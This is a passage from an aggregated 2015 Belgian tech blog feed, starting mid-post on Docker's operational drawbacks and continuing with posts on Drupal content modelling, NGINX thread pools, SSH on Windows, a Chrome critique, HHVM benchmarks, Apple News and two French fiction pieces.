The people I talked to agreed on the fact that Docker is rather developer focused and that it allows them to build images containing a lot of stuff where you might have no control over. It abstracts away possible issues. The container works so all is well..right?

I believe that when you start building and using containers the DevOps aspect is more important then ever. If for instance a CVE is found in a library/service that has been included in the container image you'll need to update this in your base image and then rolled out through your deployment chain. To make this possible all stakeholders must know what is included, and in which version of the Docker image. Needless to say this needs both ops and devs working together. I don't think there's a need for "separation of concerns" as Docker likes to advocate. Haven't we learned that creating silo's isn't the best idea?

More complexity

Everything in the way you used to work becomes different once you start using containers. The fact that you can't ssh into something or let your configuration management make some changes just feels awkward.

Networking

By default Docker creates a Linux Bridge on the host where it creates interfaces for each container that gets started. It then adjusts the iptables nat table to pass traffic entering a port on the host to the exposed port inside the container.

To have a more advanced network configuration you need to look at tools like weave, flannel, etc.. Which require more research to see what fits your specific use case best.

Recently I was wondering if it was possible to have multiple nics inside your container because I wanted this to test Ansible playbooks that configure multiple nics. Currently it's not possible but there's a ticket open on GitHub https://github.com/docker/docker/issues/1824 which doesn't give me much hope.

Service discovery

Once you go beyond playing with containers on your laptop and start using multiple docker hosts to scale your applications, you need to have a way to know where the specific service you want to connect to is running and on what port it is running. You probably don't want to manually define ports per container on each host because that will become tedious quite fast. This is were tools like Consul, etcd etc.. come in. Again some extra tooling/complexity.

Storage

You will always have something that needs persistence and when you do, you'll need storage. Now, when using containers the Docker way, you are assumed to put as much as possible inside the container image. But some things like log files, configuration files, application generated data, etc.. are a moving target.

Docker provides volumes to pass storage from the host inside a container. Basically you map a path on the host to a path inside the container. But this poses some questions like, how do I share this in case the container gets started, how can I make sure this is secure? How do I manage all these volumes? What is the best way to share this among different hosts? ...

One way to consolidate your volumes is to use "data-only" containers. This means that you run a container with some volumes attached to it and then link to them from other containers so they all use a central place to store data. This works but has some drawbacks imho.

This container just needs to exist (it doesn't even need to be running) and as long as this container or a container that links to it exists, the volumes are kept on the system. Now, if you by accident delete the container holding the volumes or you delete the last container linking to them, you loose all your data. With containers coming and going, it can become tricky to keep track of this and making mistakes at this level has some serious consequences.

Security

Docker images

One of the "advantages" that Docker brings is the fact that you can pull images from the Docker hub and from what I have read this is in most cases encouraged. Now, everyone I know who runs a virtualization platform will never pull a Virtual Appliance and run it without feeling dirty. when using a cloud platform, chances are that you are using prebuild images to deploy new instances from. This is analogue to the Docker images with that difference that people who care about their infrastructure build their own images. Now most Linux distributions provide an "official" Docker image. These are the so called "trusted" images which I think is fine to use as a base image for everything else. But when I search the Docker Hub for Redis I get 1546 results. Do you trust all of them and would you use them in your environment?

What can go wrong with pulling an OpenVPN container. Right..?

This is also an interesting read: https://titanous.com/posts/docker-insecurity

User namespacing

Currently there's no user namespacing which means that if a UID inside the docker container matches the UID of a user on the host, that user will have access to the host with the same permissions. This is one of the reasons why you should not run processes as the root user inside containers (and outside). But even then you need to be careful with what you're doing.

Containers, containers, containers..

When you run more and more stuff in containers, you'll end up with a few hundred, thousand or even more containers. If you're lucky they all share the same base image. And even if they do, you still need to update them with fixes and security patches which results in newer base images. At this point all your existing containers should be rebuild and redeployed. welcome to the immutable world..

So the "problem" just shifts up a layer. A Layer where the developers have more control over what gets added. What do you do when the next OpenSSL bug pops up? Do you know which containers has which OpenSSL version..?

Minimal OS's

Everyone seems to be building these mini OS's these days like CoreOS, ProjectAtomic, RancherOS, etc.. The idea is that updating the base OS is a breeze (reboot, AB partition etc..) and all services we need are running inside containers.

That's all nice but people with a sysadmin background will quickly start asking questions like, can I do software raid? Can I add my own monitoring on this host? Can I integrate with my storage setup? etc...

Recap

What I wanted to point out is that when you decide to start using containers, keep in mind that this means you'll need to change your mindset and be ready to learn quite some new ways to do things.

While Docker is still young and has some shortcomings I really enjoy working with it on my laptop and use it for testing/CI purposes. It's also exciting (and scary at the same time) to see how fast all of this evolves.

I've been writing this post on and off for some weeks and recently some announcements at Dockercon might address some of the above issues. Anyway, if you've read until here, I want to thank you and good luck with all your container endeavors.

by Vincent Van der Kussen at June 21, 2015 10:00 PM

Wim Leers

Eaton & Urbina: structured, intelligent and adaptive content

While walking, I started listening to Jeff Eaton’s Insert Content Here podcast, episode 25: Noz Urbina Explains Adaptive Content. People must’ve looked strangely at me because I was smiling and nodding — still walking :) Thanks Jeff & Noz!

Jeff Eaton explained how the web world looks at and defines the term WYSIWYG. Turns out that in the semi-structured, non-web world that Noz comes from, WYSIWYG has a totally different interpretation. And they ended renaming it to what it really was: WYSIWOO.

Jeff also asked Noz what “adaptive content” is exactly. Adaptive content is a more specialized/advanced form of structured content, and in fact “structured content”, “intelligent content” and “adaptive content” form a hierarchy:

In other words, adaptive content is also intelligent and structured; intelligent content is also structured, but not all structured content is also intelligent or adaptive, nor is all intelligent content also adaptive.

Basically, intelligent content better captures the precise semantics (e.g. not a section, but a product description). Adaptive content is about using those semantics, plus additional metadata (“hints”) that content editors specify, to adapt the content to the context it is being viewed in. E.g. different messaging for authenticated versus anonymous users, or different nuances depending on how the visitor ended up on the current page (in other words: personalization).

Noz gave an excellent example of how adaptive content can be put to good use: he described how we he had arrived in Utrecht in the Netherlands after a long flight, “checked in” to Utrecht on Facebook, and then Facebook suggested to him 3 open restaurants, including cuisine type and walking distance relative to his current position. He felt like thanking Facebook for these ads — which obviously is a rare thing, to be grateful for ads!

Finally, a wonderful quote from Noz Urbina that captures the essence of content modeling:

How descriptive do we make it without making it restrictive?

If it isn’t clear by now — go listen to that podcast! It’s well worth the 38 minutes of listening. I only captured a few of the interesting points, to get more people interested and excited.1

What about adaptive & intelligent content in Drupal 8?

First, see my closely related article Drupal 8: best authoring experience for structured content?.

Second, while listening, I thought of many ways that Drupal 8 is well-prepared for intelligent & adaptive content. (Drupal already does structured content by means of Field API and the HTML tag restrictions in the body field.) Implementing intelligent & adaptive will surely require experimentation, and different sites/use cases will prefer different solutions, but:

I think that those two modules would be very interesting, useful additions to the Drupal ecosystem. If you are working on this, please let me know — I would love to help!


  1. That’s right, this is basically voluntary marketing for Jeff Eaton — you’re welcome, Jeff! 

by Wim Leers at June 21, 2015 06:08 PM

June 19, 2015

Frank Goossens

Music from Bruxelles ma belle Tube: Casssandra

Now that I found Gilles Peterson’s WorldWide as a podcast on Radio Nova I’m once again enjoying the nuggets Gilles disperses to his worldwide audience. A couple of weeks ago he played “Sifflant Soufflant” by Casssandre (yes, 3 s’es, must be a Belgian thing), a Belgian jazz singer. While looking for that specific track on YouTube did not yield a result, I did find this live video which is part a series of performances recorded in beautiful places in Brussels;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

So there you have it; 2 nuggets in one go. Enjoy your weekend!

by frank at June 19, 2015 05:39 AM

June 18, 2015

Mattias Geniar

Increasing Nginx Performance With Thread Pooling

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

Fascinating stuff.

The result of enabling thread pooling and then benchmarking the change shows some pretty impressive performance gains.

Now our server produces 9.5 Gbps, compared to ~1 Gbps without thread pools!

and

The average time to serve a 4-MB file has been reduced from 7.42 seconds to 226.32 milliseconds (33 times less), and the number of requests per second has increased by 31 times (250 vs 8)!

The title of the article seems wrong, as a best-case scenario has the possibility to increase bandwidth 10x and the time to serve a file is 33x faster (under the best of circumstances).

Worth a read and definitely worth a test in your lab: Thread Pools in NGINX Boost Performance 9x!

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 08:00 PM

How SSH In Windows Server Completely Changes The Game

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

A few days ago, Microsoft announced their plans to support SSH.

At first, I only skimmed the news articles and misinterpreted the news as PowerShell getting SSH support to act as a client, but it appears this goes much deeper: SSH coming to Windows Server is both client and server support.

A popular request the PowerShell team has received is to use Secure Shell protocol and Shell session (aka SSH) to interoperate between Windows and Linux – both Linux connecting to and managing Windows via SSH and, vice versa, Windows connecting to and managing Linux via SSH.
Looking Forward: Microsoft Support for Secure Shell (SSH)

While the announcement in and of itself is worth a read, the comments show a lot of concern into the how of the implementation, hoping for industry standard implementations instead of quirky forks of the protocol.

In the comments, the PowerShell official user also confirms the SSH implementation having both client and server support.

The SSH implementation will support both Client and Server.

This is super exciting.

SSH Public Key Authentication

SSH is just a protocol. Windows already has several protocols & methods for managing a server (RPC, PowerShell, AD Group Policies, ...), so why bring another one?

Supporting the SSH server on Windows can bring the biggest advancement to Windows in a long time: SSH public key authentication.

Historically, managing a Windows server was either based on username/password combinations or NTLM. There are other alternatives, but these 2 are the most widely used. You either type your username and password, or you belong to an Active Directory domain for easier access.

Managing standalone Windows machines has therefore always been a serious annoyance. It requires keeping a list of username/password combinations.

If SSH support in Windows is done right, it would mean a new authentication method that is perfect for automation tasks.

It inevitably also means that supporting SSH on Windows isn't trivial: it ties into the user management, authentication & authorization. This would be a major feature to push out.

Config Management For Windows

Configuration Management isn't new for Windows. In fact, in many regards, automating state and configuration is far more advanced in Windows than it is on Linux.

However, the tools to automate on Windows have mostly been proprietary, complex and very expensive to both purchase and maintain. In the Open Source world there are many alternatives for config management a user could choose from.

Since a couple of years, even the Open Source tools have begun to show rudimentary support for managing Windows Server (ref.: Puppet, Chef, Ansible, ...).

Having SSH access to a Windows Server with proper SSH public key support would allow all kind of SSH-based config management tools to be used for managing a Windows Server, whether it's in an Active Directory domain or a standalone server.

Even if Ansible didn't have native Windows support, just having SSH available would be sufficient to use Ansible to completely manage a Windows server.

Imagine the power.

The Proof Of The Eating Is In The Pudding

Hmmm, pudding ...

Sorry, I digress.

As Microsoft has correctly admitted, this is the 3rd attempt to integrate SSH into Windows.

The first attempts were during PowerShell V1 and V2 and were rejected. Given our changes in leadership and culture, we decided to give it another try and this time, because we are able to show the clear and compelling customer value, the company is very supportive.

A public statement proclaiming support for native SSH is a powerful thing, but it's by no means a guarantee that it'll happen. The lack of a clear timeline also shows how early on the process this idea lies.

I'm hoping support for SSH server in Windows Server eventually becomes a standard on every server. I'm biased because I come from a Linux background, but having an SSH server with public key authentication would greatly simplify my life of automating Windows environments.

There are alternatives for doing that. There have always been alternatives. I just don't like them. I like having SSH access to manage a server and I'm rooting for Microsoft to pull this off as well.

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 07:27 PM

Joram Barrez

Activiti 6 Launch Recordings online

The Activiti Community Day in Paris last week was a blast. The venue, the talks, the attendees … all were top notch. For the people that weren’t able to attend this time (I’m sure you had good excuses … right?), don’t worry. We’ve recorded most of the sessions (and the slides are already online a couple […]

by Joram Barrez at June 18, 2015 11:37 AM

Frederic Hornain

[The Enterprisers Project] How to improve the ways internal employees interacted with IT.

The Enterprisers Project

 

 

 

 

Sometimes, such little things can considerably improve the efficiency.
That is what we call an Enterprising moment.

 

 

Ref : https://enterprisersproject.com/

KR
/f


by Frederic Hornain at June 18, 2015 06:31 AM

Sébastien Wains

Verify expiration date for a local x509 certificate

Use this command:

openssl x509 -noout -in /etc/pki/tls/certs/client.crt -dates

Output would be:

notBefore=Feb 20 16:20:08 2015 GMT
notAfter=Feb 20 16:20:08 2016 GMT

June 18, 2015 04:00 AM

Switching back from Chrome/Chromium to Firefox and a global rant about Google

I've used Chrome (and Chromium, depending on the platform, from now on I'll refer to it as Chrome) pretty much since it went out of beta.

I started to get annoyed with the last few versions though.

It all started as I tried to install an application on a Windows 7 machine (I'm not in an admin account at the time). That app contained malware not detected by the antivirus (I was not 100% confident it was clean though). It installed a couple of Chrome extensions that were redirecting traffic to ads and opening popups.

Trying to get rid of it has been challenging. If you removed the extension in the extension manager, upon next start up it would appear again. I tried Shield for Chrome but it wasn't helpful, it would just uninstall the extension but it would reappear upon the next restart. It is actually because Chrome was starting with some flags that were calling for extensions located on the filesystem. Run chrome://version and see the command line, you would see the directories called.

On the other hand, Chrome has been very good at removing an extension that Google considered "harmful". The extension is called "Download Youtube Chrome" (DYC), and you can only install it by downloading it from the web and installing it as an unpacked extension. Of course, this extension allows to download Youtube videos, so apparently copyrights are more harmful than actual malwares potentially spreading on thousands of machines.

Even before the DYC episode, I was using another extension allowing to download Youtube videos: "Video Downloader Professional". It was working great until Google decided to remove offending extensions from their store and by offending, they probably meant copyright offending (I commute a lot with poor reception, so I download videos for offline viewing).

And even before that, Google started to implement many new features that makes Chrome today twice as big as Firefox as (comparison based on OS X): profile management (chrome://flags/#enable-new-profile-management), OK Google voice search (this thing is listening to you constantly if enabled, and any OK Google record is saved in Google Cloud (you can delete them though)), desktop notifications.

You used to be able to specify where desktop notifications were supposed to appear, but Google decided to remove the feature, so you have to stick with notifications in the upper right corner of your screen, an area that you are very likely to click (Wi-Fi picker for example). I can't count how many times I have wrongly clicked on the stupid notification that just poped up in my face, triggering an action.

This goes along with default settings enabling translation and location (well, you get a popup asking if you want to share your location or if you want to translate the page), and those tend to slow down the browser considerably (I'm talking about a late 2008 Macbook here).

I had a couple of bookmarks synced in their "cloud" by signing in. I protected that with my Google password from that time, but today I have a new password and I still need to remind my old password whenever I install Chrome on a new machine. I haven't found how to manage that password (didn't search so much though, but it should be an obvious option).

Lastly, it has been reported that Chromium silently downloads binaries related to voice upon every start on Linux Debian. See http://www.theregister.co.uk/2015/06/17/debian_chromium_hubbub/ and https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786909

So all in all, Chrome has become a memory hog, and Google is controlling your browser in a unprecedented way. The will push or remove whatever features or design, whenever they wish and don't care about what you think.

And if you believe that the supposedly open source project gives you a voice in the design and implementation, see this link talking about the decision to hide http:// from the URL bar when it's not secured by SSL: https://code.google.com/p/chromium/issues/detail?id=41467

See this comment particularly: https://code.google.com/p/chromium/issues/detail?id=41467#c19

Chromium UI design is not a democracy and is not based on users' votes ~ Peter Kasting

The problem with Chrome design is so important that some people even petionned against Kasting and the UI team: https://www.change.org/p/lawrence-page-replace-peter-kasting-and-the-google-chrome-ui-team

Well at least, they haven't given in on the new trend (started by Apple and Safari) to hide the path from the URL in the address bar. How soon though Peter?

I'm now switching back to Firefox, the last time I used it on a daily basis, it was version 3 or so. What is it now? Version 38. Holy cow, time flew.

If only Chrome was the only problem with Google.

Their are trying to force Google+ down our throats in the nastiest ways (you have to have a G+ account to upload Youtube videos, you can't comment Android applications without G+, etc.).

They shut down major applications like Reader probably in a way to increase traffic to G+, but it failed big time. They should have it at least integrated in G+, instead they lost those users.

iGoogle was neat too. Too good probably (my dad loved it), they had to kill it.

They are forcing Hangouts for people who still use Google Talk. Every once in a while, Gmail will switch to Hangouts without notice. Thanks, I'm now using competing products.

I'm done with the force-feeding attitude of Google that got so powerful that they think their vision of the web should be pushed (silently) to users. They know it, a vast majority of users just grasp things and don't question what they are presented with. They also have the right to pull the plug on popular services to serve their purpose of winning the social network business. Give up already Google, 90% of users never posted anything on your G+ toy: https://www.stonetemple.com/real-numbers-for-the-activity-on-google-plus/

June 18, 2015 04:00 AM

June 17, 2015

Frank Goossens

HTML/ Javascript/ multimedia-extranvanganza essay about code

Paul Ford’s “What is Code” on Bloomberg Business is a comprehensive and utterly superb essay/ course/ HTML-javascript-multimedia-extravaganza about IT, computer history, programming languages, development, frameworks, version control, testing, shipping projects and much, much more. The entire text is licenced under Creative Commons (by-nc-nd) and all is up on GitHub to fork or simply admire.

Thanks for sharing Nicolas :-)

by frank at June 17, 2015 11:25 AM

June 16, 2015

Mark Van den Borre

Zijn lied is uit. Zijn instrument zwijgt voor immer. Hij is overleden. Hij leeft niet meer.

by Mark Van den Borre (noreply@blogger.com) at June 16, 2015 10:23 AM

Mattias Geniar

Kickstarter Now Available In Belgium

The post Kickstarter Now Available In Belgium appeared first on ma.ttias.be.

I'm curious what us Belgians can achieve with a platform like Kickstarter.

kickstarter_belgium

We’re thrilled to announce that Kickstarter is now available to creators in five more European countries: Austria, Belgium, Italy, Luxembourg, and Switzerland. Starting today, artists, inventors, designers, and makers of all types can launch projects on Kickstarter and share them with our global community.
Welcoming Belgium to the Kickstarter Community!

We've always been able to back projects, but as of today we can start them as well. A lot of creative minds here in this little country, amaze us -- please!

The post Kickstarter Now Available In Belgium appeared first on ma.ttias.be.

by Mattias Geniar at June 16, 2015 10:03 AM

June 15, 2015

Mattias Geniar

uBlock Origin Now Blocking Access To SourceForge

The post uBlock Origin Now Blocking Access To SourceForge appeared first on ma.ttias.be.

The SourceForge giant is going down.

uBlock Origin is a popular AdBlocker and "privacy protector". I've been using it as an AdBlockPlus replacement every since it came out. And since today, it's started to block access to the SourceForge website.

Visitors that use uBlock are greeted with the following message.

ublock_sourceforge_block

This is no doubt a result of the recent actions taken by SourceForge, of bundling adware in the Windows installer of Gimp.

SourceForge has long been replaced by Github for many, this is just another nail to the coffin.

The post uBlock Origin Now Blocking Access To SourceForge appeared first on ma.ttias.be.

by Mattias Geniar at June 15, 2015 02:11 PM

June 14, 2015

Mattias Geniar

HHVM Performance Lockdown: Is HHVM Reaching Its Limit?

The post HHVM Performance Lockdown: Is HHVM Reaching Its Limit? appeared first on ma.ttias.be.

The latest HHVM blogpost is all about getting performance gains from HHVM in real-life situations. With a noticeable increase for MediaWiki, all other frameworks are stalling.

Is HHVM reaching its performance limit?

These were the results of the week-long effort focussed on increasing the performance of HHVM, showing the throughput of Drupal, WordPress & MediaWiki after the improvements were implemented.

hhvm_lockdown_performance

MediaWiki got a nearly 20% improvement, but WordPress & Drupal remained the same.

Earlier on, the HHVM team already worked together with MediaWiki to assist in their migration from PHP to HHVM, this additional knowledge may have helped in gaining the 20% performance boost.

In the lockdown, we were able to improve MediaWiki performance by 19.4%, and WordPress by 1.8%. Unfortunately, Drupal wins were no longer measurable once the Drupal database was patched to fix the aforementioned plugin bug.

But equally as important, HHVM remains faster than PHP.

Across the board we found that HHVM performs best on applications where CPU time is maximized. In particular we’re 1.55 times faster than PHP 7 on a MediaWiki workload, 1.1 times faster on a Drupal 7 workload, and 1.19 times faster on a WordPress workload.

As none of these frameworks take advantage of the asynchronous I/O architecture available in HHVM (i.e., async), it’s not surprising that the greatest performance benefits come from the efficient execution of PHP code possible with a JIT compiler.

These are the latest benchmark figures, as ran by the HHVM team, comparing HHVM to the latest PHP builds.

hhvm_performance_comparison

I should take my time and redo my PHP vs HHVM performance benchmark from last year again, since a lot has changed to both PHP and HHVM in the meantime.

The entire performance lockdown of HHVM blogpost is worth a read and goes into great technical detail.

But with all these performance tweaks, most users will only notice a 1-5% increase in their applications. Could this mean HHVM has reached its limit when it comes to improving PHP's raw performance?

While the benefits of async I/O are unique to HHVM and could further increase performance greatly, these kind of features aren't yet available to us common PHP users due to lack of compatibility in the main PHP engine.

The post HHVM Performance Lockdown: Is HHVM Reaching Its Limit? appeared first on ma.ttias.be.

by Mattias Geniar at June 14, 2015 10:15 AM

June 12, 2015

Lionel Dricot

L’argument du bourreau

6277699374_12b9604b64_z

C’était il n’y a pas si longtemps, à une époque où l’air était pur et les forêts recouvraient notre pays. L’eau des ruisseaux était limpide et l’on mourait d’une rage de dent à trente ans.

Le village était florissant et reconnu dans tout le comté pour le savoir-faire de ses habitants : la plupart étaient bourreaux de père en fils.

Chaque famille avait sa spécialité. Faire souffrir lentement. Faire avouer rapidement. Torturer de manière spectaculaire. Tuer efficacement et sans douleur. Ces derniers étaient particulièrement appréciés par l’administration publique. Quoiqu’il en soit, chacun avait sa clientèle, son histoire, son patrimoine et sa fierté. Le village exportait sa compétence dans tout le pays et même au-delà !

Un jour d’été, une étrange rumeur se fit dans le village. Le gouvernement étudierait en secret la ratification d’une charte des droits de l’humain. Cette charte comportait l’abolition pure et simple de toute peine de mort, qu’elle soit rapide ou longue et douloureuse. De même, la charte prohiberait la torture sur l’ensemble du territoire.

Le village était bien entendu fortement opposé à cette charte. Elle signifiait la ruine économique pure et simple. La fin d’une tradition séculaire, d’un art transmis de génération en génération.

Le village était souvent pris en exemple dans les débats politiques qui dégénéraient souvent en violentes manifestations.
— Il faut bien que les gens du village vivent ! disaient les uns.
— Comment voulez-vous offrir une reconversion professionnelle à ces centaines de familles ? renchérissaient les autres.
— On peut ne pas être d’accord, ils ne font que leur boulot ! assénaient les troisièmes.

Le mouvement étudiant prit fait et cause en faveur de la charte. Après quelques sanglants débordements, les meneurs furent arrêtés et condamnés à mort. Le bourreau qui vint du village était justement un jeune homme qui avait beaucoup voyagé. Avant de porter le coup fatal, il s’adressa discrètement à ses victimes.
— Vous savez, je pense que vous avez raison. On ne peut pas tuer les gens, le progrès nécessite d’abolir la peine de mort. Je tenais à vous remercier pour votre combat. Puis-je vous serrer la main ?
— Mais ne vas-tu pas nous tuer ?
— Que voulez-vous, c’est mon boulot. Je n’ai pas le choix. Mais je suis de tout cœur avec vous.

Le bourreau accomplit son œuvre sans discuter. Les étudiants survivants en firent un symbole et le remercièrent pour son humanité et son courage.

Il devint un médiateur entre les deux parties et mit fin au conflit en prononçant un discours désormais célèbre.

« Tuer et faire souffrir les gens est une coutume barbare. Nous sommes d’accord que le progrès ne peut se construire que sur le respect de l’homme. L’humanité ne peut progresser qu’en défendant l’intégrité de chaque individu.

Cependant, des familles entières sont héritières d’une tradition millénaire. Elles ont investi dans de la formation et du matériel de pointe. Elles vivent, boivent, mangent et consomment. Elles font tourner l’économie. N’ont-elles pas le droit de vivre elle aussi ? N’ont-elles pas le droit de voir leur travail respecté ?

Mettre à mort un humain ne me plaît pas. Mais c’est un mal nécessaire afin de faire vivre la société et les individus qui la composent. »

L’argument du bourreau fit mouche. Certes, le recours aux bourreaux devint de moins en moins populaire. Plus personne ne payait pour leurs services ou pour assister à une exécution. Les exécutions devinrent gratuites et étaient parrainées par des grandes marques de boisson ou de nourriture. Malgré une baisse notable de la criminalité, l’état encouragea les juges à se montrer sévères et lança un grand plan de subventions pour les bourreaux qui, sans cela, n’existeraient sans doute plus de nos jours.

Aussi, lorsqu’on vous explique que votre travail est inutile voire néfaste, lorsqu’on prétend qu’il est nécessaire de faire évoluer la société, rappelez-vous l’argument du bourreau : c’est votre job. Vous n’avez pas le choix. Et il y a des dizaines de gens comme vous qui vivent de ce travail. Certains sont trop vieux pour espérer une reconversion. Ils ont le droit de vivre. Alors, même si c’est néfaste, dangereux, inutile ou stupide, même si vous n’êtes pas vraiment d’accord avec ce que vous faites, il est nécessaire de défendre ceux qui, comme vous, ont le courage d’obéir et de faire leur boulot sans poser de questions.

 

Photo par Joan G. G.

 

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 12, 2015 03:05 PM

June 11, 2015

Frank Goossens

Music from Our Tube; Boxed In(dia)

Didn’t know “Boxed In“, but this is a nice song and the clip apparently was filmed on location in a laughing therapy club in Calcutta, India (I work for an Indian IT services company, so I can relate immensely);

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 11, 2015 01:08 PM

June 09, 2015

Dries Buytaert

The post-browser era of the web is coming

At yesterday's Worldwide Developer Conference keynote, Apple announced its annual updates to iOS, OS X, and the new watchOS. As usual, the Apple rumor blogs correctly predicted most of the important announcements weeks ago, but one important piece of news only leaked a few hours before the keynote: the launch of a new application called "News". Apple's News app press release noted: "News provides beautiful content from the world's greatest sources, personalized for you".

Apple basically cloned Flipboard to create News. Flipboard was once Apple's "App of the Year" in 2010, and it remains one of the most popular reading applications on iOS. This isn't the first time Apple has chosen to compete with its ecosystem of app developers. There is even a term for it, called "Sherlocking".

But forget about Apple's impact on Flipboard for a minute. The release of the News app signifies a more important shift in the evolution of the web, the web content management industry, and the publishing industry.

Impact on content management platforms

Why is Apple's News app a big deal for content management platforms? When you can read all the news you are interested in in News, you no longer have to visit websites for it. It's a big deal because there are half a billion active iOS devices and Apple will ship its News app to every single one of them. It will accelerate the fact that websites are becoming less relevant as an end-point destination.

Some of the other new iOS 9 features will add fuel to the fire. For example, Apple's search service Spotlight will also get an upgrade, allowing third-party services to work directly with Apple's search feature. Spotlight can now "deep link" to content inside of a website or application, further eliminating website or applications as end-points. You could search for a restaurant in Yelp directly from your home screen, and go straight to Yelp's result page without having to open the Yelp website or application. Add to that the Apple Watch which doesn't even ship with a web browser, and it's clear that Apple is about to accelerate the post-browser era of the web.

The secret to the News app is the new Apple News Format; rumored to be a RSS-like data feed with support for additional design elements like images, videos, custom fonts, and more. Apple uses these feeds to aggregate content from different news sources, uses machine learning to match the best content to a given user, and provides a clean, consistent look and feel for articles coming from the various news sources. That is the long way of saying that Apple decides what the best content is for you, and what the best format is to deliver it in. It is a profound change, but for most people this will actually be a superior user experience.

The release of Apple News is further proof that data-driven experiences will be the norm and of what I have been calling The Big Reverse of the Web. The fact that for the web to reach its full potential, it will go through a massive re-architecture from a pull-based architecture to a push-based architecture. After the Big Reverse of the Web is complete, content will find you, rather than you having to find content. Apple's News and Flipboard are examples of what such push-based experiences look like; they "push" relevant and interesting content to you rather than you having to "pull" the news from multiple sources yourself.

When content is "pushed" to you by smart aggregators, using a regular web browser doesn't make much sense. You benefit from a different kind of browser for the web. For content management platforms, it redefines the browser and websites as end-points; de-emphasizing the role of presentation while increasing the importance of structured content and metadata. Given Apple's massive install base, the launch of its News app will further accelerate the post-browser era of the web.

I don't know about your content management platform, but Drupal is ready for it. It was designed for a content-first mentality while many competitive content management systems continue to rely on a dated page-centric content model. It was also designed to be a content repository capable of outputting content in multiple formats to multiple end-points.

Impact on publishing industry

Forget the impact on Flipboard or on content management platforms, the impact on the publishing world will even be more significant. The risk for publishers is that they are being disintermediated as the distribution channel and that their brands become less useful. It marks a powerful transformation that could de-materialize and de-monetize much of the current web and publishing industry.

Because of Apple's massive installed base, Apple will now own a large part of the distribution channel and it will have an outsized influence on what hundreds of millions of users will read. If we've learned one thing in the short history of the Internet, it is that jumping over middlemen is a well-known recipe for success.

This doesn't mean that online news media have lost. Maybe it can actually save them? Apple could provide publishers large and small with an immense distribution channel by giving them the ability to reach every iOS user. Apple isn't alone with this vision, as Facebook recently rolled out an experiment with select publishers like Buzzfeed and the New York Times called Instant Articles.

In a "push economy" where a publisher's brand is devalued and news is selected by smart aggregators, the best content could win; not just the content that is associated with the most well-known publishing brands with the biggest marketing budgets. Publishers will be incentivized to create more high-quality content -- content that is highly customized to different target audiences, rather than generic content that appeals to large groups of people. Success will likely rely on Apple's ability to use data to match the right content to each user.

Conclusion

This isn't necessarily bad. In my opinion, the web isn't dead, it's just getting started. We're well into the post-PC era, and now Apple is helping to move consumers beyond the browser. It's hard to not be cautiously optimistic about the long-term implications of these developments.

by Dries at June 09, 2015 08:38 AM

June 08, 2015

Lionel Dricot

Printeurs 31

3558322825_79fd90cc28_z
Ceci est le billet 31 sur 31 dans la série Printeurs

Depuis combien de temps suis-je enfermé sans bouger ? Depuis cet instant mythique que j’appelle naissance. Depuis combien de temps… Mais qu’est-ce que le temps si ce n’est une perception, une sensation, une douleur. Le temps, c’est la vie qui s’écoule goutte après goutte de notre corps. Le temps n’est que de la souffrance distillée, un tourment qui nous donne l’impression d’exister.

Les points blancs dansent devant mes yeux. La boule bleue grandit. Je suis seul face à l’univers. Enfin en sécurité. Pour la première fois de ma vie, j’ai la certitude que je ne vais pas recevoir de coups, que je ne vais pas me faire insulter. Étrange sensation. Je ferme les yeux. Lorsque je les réouvre, la boule bleue a envahi mon champs de vision. Je les referme. Des coups secouent mon corps, mon estomac se noue, un bruit furieux m’inonde et m’envahit tandis que je rôti sous l’effet d’une intense chaleur. Je ferme les yeux, je hurle et j’accueille la douleur comme une vieille amie trop longtemps absente. Mes yeux se révulsent et je disparait dans un torrent de noirceur infinie.

Le silence me réveille en sursaut. Tout mon corps semble peser une tonne et me tire vers le plancher. Avec difficulté, je m’extrait du vaisseau et me met à ramper sur le plancher. Éclairé par une blafarde lumière orangée, le hangar dans lequel je me trouve me semble gigantesque. Tournant la tête, je découvre une large ouverture donnant sur une boule lumineuse. Mon astéroïde ? Non, il n’est pas si rond. Sans doute un autre, rempli lui aussi d’usines, de travailleurs et de gardiens. Mais il ne fait aucun doute que mon vaisseau est arrivé par cette ouverture.

Je me débarrasse du scaphandre. Ma respiration est plus aisée mais je me sens tout de même particulièrement alourdi. Le silence m’étonne. Personne ne vient donc réceptionner la cargaison ? Après m’être trainé derrière une caisse, je me recroqueville, espérant pouvoir guetter sans être vu.

Les voix me réveillent. Une lumière vive et blessante inonde à présent le hangar. Deux hommes se rapprochent. Deux hommes grands, droits. Ils passent près de ma cachette et j’ai le temps d’examiner leur visage. Ils sont beaux. Leurs cheveux et leurs dents sont ordonnés. Ils marchent d’un pas énergique tout en discutant. Le plus âgé respire la confiance et l’expérience. Ses cheveux sont grisonnants et pourtant il parle et bouge comme un jeune homme. Leur accent m’est difficilement compréhensible, leur vocabulaire m’échappe le plus souvent. Mais je perçois l’essentiel de leur discussion.

— Tous ces travailleurs me semblent bien traités. Certes, leur travail est répétitif et peu épanouissant mais peut-être est-ce ce qui leur convient. Pourquoi veux-tu absolument les remplacer par des printeurs ?
— Ne soit pas naïf Nellio. Tous ces gens que tu as vu avec des belles casquettes bleues, des gants bleus et un tablier bleu ne font strictement rien. Ce sont des télé-pass à qui on fait croire qu’ils travaillent.
— Mais j’ai pourtant vu qu’ils vissaient des pièces, qu’ils assemblaient…
— Bien sûr. Un département assemble des pièces, un second les démonte et un troisième s’occupe du transport entre les deux premiers.
— Mais pourquoi ? Quel est le but ?
— Diminuer le nombre de télé-pass.
– C’est absurde !
— Pourquoi ? Les télé-pass veulent du travail. Les travailleurs veulent qu’il y ait moins de télé-pass qui soient payés à ne rien faire. Tout le monde est content.
— Mais dans ce cas, Georges, pourquoi avoir créé une fondation pour le bien-être des ouvriers ? Ne me dit pas que c’est juste pour ton image ?
